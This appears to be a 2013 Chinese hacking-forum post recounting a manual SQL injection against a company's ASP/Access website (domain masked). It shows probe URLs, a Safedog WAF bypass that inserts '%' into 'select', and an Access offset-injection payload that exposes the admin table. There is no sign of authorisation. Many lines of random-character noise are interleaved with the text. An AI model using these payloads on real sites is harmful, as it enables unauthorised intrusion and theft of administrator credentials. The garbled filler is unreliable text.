中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
3 m s% K& I3 G4 o
: y; \( w1 ^% {% f1 T3 T8 Y
8 M+ ]0 k2 o/ ~. s* K8 F
顺手加个admin
3 O+ a; Q! {9 T9 L# x8 T8 @
0 o: z) \0 q: D. p3 s" ^3 m. {
, t8 d8 @$ l5 g1 U- Y8 q, K
默认后台。
/ _3 k, t/ ], N
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
! \1 w7 a9 B$ A
/ S" b( X# \" k# {6 X( O, l' W
. W2 @) ]' _) v) m1 S
- Y" _; X4 w. V1 O8 d* W; F/ U# d
所以就不用御剑扫了,待会直接封IP。
$ s: X1 [ @; H' N7 I% F: \6 J
, Q' L. G. }5 g1 j7 n: e1 J( t
用order by语句判断是否存在注入。
$ J4 W" u- T0 e- i* p3 J
http://www.xxx.com
/product_show.asp?id=997 order by 1
" ?. J6 b! j* v( C# k
http://www.xxx.com
/product_show.asp?id=997 order by 100
% C: r' H& _2 g, P( `
现在存在注入,经测试后发现是9个字段。
$ g3 d$ ^6 B6 N O" X
2 i2 i0 f* t* n& S, E7 x1 j
接下来进行联合查询,猜是否存在admin表。
3 m z0 O j O5 P9 l1 ^) Z; ~* D
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
$ N) c& X6 v0 A: Y
* k! R/ q- G: q: l; r0 L
# r7 [: J9 _# G; [, ? V/ \, j# P
3 P0 C0 K2 d" p) R) @
在select中间加个%,se%lect绕过安全狗。
5 g6 L5 I1 q6 o. n$ u
, _8 }2 K7 A3 C
, P; |4 Y& b. `
发现存在admin表,然后开始手工猜常用的字段。
- k- I8 W Z. F
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
, {- U9 y9 c% `9 B; F) @8 R
6 l2 \8 o2 b6 \$ O: p
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
. ~8 I6 v7 [( o4 ~( Y5 T5 l1 |0 h0 S
V8 E7 {0 g( N* e- x* _, r
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
8 L, _- [1 _/ ~/ X1 A1 E
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
! y3 k! i" N+ p' t
好了,敏感内容出显了。
K$ P) r" t* F) b/ F# ]3 P
. V& Z, _* K1 T
3 g. \. H6 h) V8 R
3 O( |5 W9 q: u* \# S# ?
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2